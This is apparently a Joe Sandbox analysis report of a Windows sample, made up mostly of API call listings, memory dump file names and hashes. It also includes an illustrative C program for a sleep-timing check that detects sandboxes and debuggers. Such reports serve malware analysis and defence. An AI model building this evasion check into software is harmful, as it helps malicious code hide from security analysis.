• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
                                                                                                                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2833360925-0
                                                                                                                                                                                                                • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                                                                                                • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
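Added illustration, not code recovered from the sample or produced by Joe Sandbox: the Sleep / QueryPerformanceCounter / QueryPerformanceFrequency triple in the function above is the usual shape of a sleep-timing self-check, in which a program measures how long Sleep actually took and treats a skipped delay (a sandbox fast-forwarding sleeps) or a badly stretched one (single-stepping, breakpoints) as a sign it is being analysed. The C below reproduces that logic portably so it builds outside Windows; clock_gettime(CLOCK_MONOTONIC) and nanosleep stand in for the Win32 calls, and the thresholds, the verdict names and the functions judge_sleep and timed_sleep_check are this example's own assumptions, not values read out of the binary.

```c
/* Sleep-timing self-check, illustrative only (assumed logic, not the sample's).
 * On Windows the same check is done with QueryPerformanceFrequency/Counter
 * around Sleep(); here POSIX clock_gettime() and nanosleep() stand in. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <time.h>

typedef enum {
    TIMING_OK = 0,       /* delay elapsed roughly as requested          */
    TIMING_TOO_FAST = 1, /* delay skipped or shortened: sleep patching  */
    TIMING_TOO_SLOW = 2  /* delay stretched: stepping or breakpoints    */
} timing_verdict;

/* Pure decision logic, kept separate from the clock so it can be tested
 * without actually sleeping. Thresholds are assumptions for the example. */
timing_verdict judge_sleep(uint64_t requested_ms, uint64_t measured_ms)
{
    /* Less than 90 % of the requested delay cannot happen on a real
     * scheduler (sleeps are only ever late), so it means Sleep was faked. */
    if (measured_ms * 10u < requested_ms * 9u)
        return TIMING_TOO_FAST;
    /* More than 4x the request plus 50 ms of slack: somebody held the thread. */
    if (measured_ms > requested_ms * 4u + 50u)
        return TIMING_TOO_SLOW;
    return TIMING_OK;
}

/* Monotonic wall clock in milliseconds (the QueryPerformanceCounter stand-in). */
static uint64_t now_ms(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000u + (uint64_t)ts.tv_nsec / 1000000u;
}

/* Sleep for the full duration even if interrupted by a signal (the Sleep() stand-in). */
static void sleep_ms(uint64_t ms)
{
    struct timespec req;
    req.tv_sec = (time_t)(ms / 1000u);
    req.tv_nsec = (long)((ms % 1000u) * 1000000L);
    while (nanosleep(&req, &req) == -1 && errno == EINTR) {
        /* remaining time is written back into req; keep sleeping */
    }
}

/* Time one sleep and classify the result. */
timing_verdict timed_sleep_check(uint64_t requested_ms)
{
    uint64_t start = now_ms();
    sleep_ms(requested_ms);
    uint64_t elapsed = now_ms() - start;
    return judge_sleep(requested_ms, elapsed);
}

int main(void)
{
    timing_verdict v = timed_sleep_check(200);
    printf("verdict: %s\n",
           v == TIMING_OK       ? "timing consistent" :
           v == TIMING_TOO_FAST ? "sleep was skipped (sandbox time acceleration?)" :
                                  "execution stalled (debugger?)");
    return 0;
}
```

For analysts the useful side of this is the inverse: a sandbox that fast-forwards Sleep must also fast-forward the high-resolution counter the sample reads back, or the check trips. Hooking both consistently is what keeps a record like the one above from detecting the emulation.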
APIs
• SendMessageW.USER32 ref: 004555C7
• SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Similarity
• API ID: DeleteDestroyMessageObjectSend$IconWindow
• String ID:
• API String ID: 3691411573-0
• Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
• Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
• Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
• Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
• LineTo.GDI32(?,?,?), ref: 004472AC
• MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
• LineTo.GDI32(?,?,?), ref: 004472C6
• EndPath.GDI32(?), ref: 004472D6
• StrokePath.GDI32(?), ref: 004472E4
Similarity
• API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
• String ID:
• API String ID: 372113273-0
• Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
• Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
• Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
• Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
APIs
• GetDC.USER32(00000000), ref: 0044CC6D
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
• ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
• MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
• MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
• Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
• Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
• Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
APIs
• __getptd.LIBCMT ref: 0041708E
  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
• __amsg_exit.LIBCMT ref: 004170AE
• __lock.LIBCMT ref: 004170BE
• InterlockedDecrement.KERNEL32(?), ref: 004170DB
• _free.LIBCMT ref: 004170EE
• InterlockedIncrement.KERNEL32(02E72CB8), ref: 00417106
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3470314060-0
                                                                                                                                                                                                                • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                                                                                                                                • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 0044B655
• EnterCriticalSection.KERNEL32(?), ref: 0044B666
• TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
• WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
• LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
• Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
• Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
• Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
• Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
• Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
• Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
APIs
• ___set_flsgetvalue.LIBCMT ref: 004151C0
  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
• ___fls_getvalue@4.LIBCMT ref: 004151CB
  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
• ___fls_setvalue@8.LIBCMT ref: 004151DD
• GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
• ExitThread.KERNEL32 ref: 004151ED
• __freefls@4.LIBCMT ref: 00415209
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 442100245-0
• Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
• Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
• Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
• Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
APIs
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
• _wcslen.LIBCMT ref: 0045F94A
• SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
• String ID: 0
• API String ID: 621800784-4108050209
• Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
• Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
• Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
• Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                                                                                                                                • String ID: \VH
                                                                                                                                                                                                                • API String ID: 3884216118-234962358
                                                                                                                                                                                                                • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                                                                                                • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                                                                                                                                • IsMenu.USER32(?), ref: 0044854D
                                                                                                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 004485AF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                                                                                                • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                                                                                                                                • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$_memmove_wcslen
                                                                                                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                                                                                                • API String ID: 1589278365-1403004172
                                                                                                                                                                                                                • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                                                                                                                                • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle
                                                                                                                                                                                                                • String ID: nul
                                                                                                                                                                                                                • API String ID: 2519475695-2873401336
                                                                                                                                                                                                                • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                                                                                                • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Handle
• String ID: nul
• API String ID: 2519475695-2873401336
• Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
• Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
• Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
• Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID:
• String ID: SysAnimate32
• API String ID: 0-1011021900
• Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
• Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
• Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
• Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
APIs
